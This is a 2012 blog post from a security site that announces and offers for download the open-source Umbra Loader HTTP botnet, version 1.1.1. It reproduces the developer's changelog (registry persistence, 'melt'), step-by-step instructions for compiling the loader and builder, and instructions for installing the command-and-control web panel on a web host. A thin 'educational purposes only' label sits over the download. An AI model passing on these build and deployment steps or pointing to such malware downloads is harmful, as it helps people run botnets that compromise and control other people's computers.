Saturday, May 18, 2013
Breaking News
You are here: Home / Downloads / A look into HTTP botnets – Umbra Loader

A look into HTTP botnets – Umbra Loader

Posted by: FastFlux April 1, 2012 in Downloads, Malware Leave a comment

Umbra Loader is a popular  HTTP botnet open source project, and   version 1.1.1 has been released recently by the developer, Slayer616.

Slayer616 provides programs that he coded on his blog, including his Schwarze Sonne RAT available on code.google.com and Umbra Loader.  Umbra Loader is popular as it’s open source, no dependencies as it is coded in Delphi and somewhat stable.

There have been Umbra loader based botnets found in the wild, here is one that has been exposed.

Webroots Analysis on Umbra Loader.

Release Notes:

Changelog:
[Version 1.1.1] - added Registry-Persistance
- added Melt
- fixed installation process
- tweaked MD5

HowTo build loader:
-Compile /Binary/prjLoader_XE2.dpr with Delphi XE2
-Copy /Binary/prjLoader_XE2.exe to /Builder/stub/stub.exe
-Compile /Builder/prjBuilder.dpr with Delphi XE2
-run prjBuilder.exe

HowTo setup panel:
-create new table in phpMyAdmin
-edit /Panel/Panel/inc/config.php
-upload /Panel/ to your webhost
-use /Panel/Panel/install.php to install database
-delete /Panel/Panel/install.php
-done!

Pictures of the web panel:

builder:

 

 Download

Umbra loader USE: EDUCATIONAL PURPOSES ONLY
Umbra loader USE: EDUCATIONAL PURPOSES ONLY
802a878fcb116e2d03a0 .html
Version: 1.1.1
17.7 KiB
127 Downloads
Details...

Tagged with:

About FastFlux

Owner of ZeroSecurity, intrested in programming, malware analysis and penetration testing. If you are interested in joining the ZeroSecurity team please use the contact forum located above to contact us.
Powered by ZeroSecurity | Designed by Tielabs
© Copyright 2013, All Rights Reserved
Scroll To Top
x
EmailEmail
PrintPrint
WP Socializer Aakash Web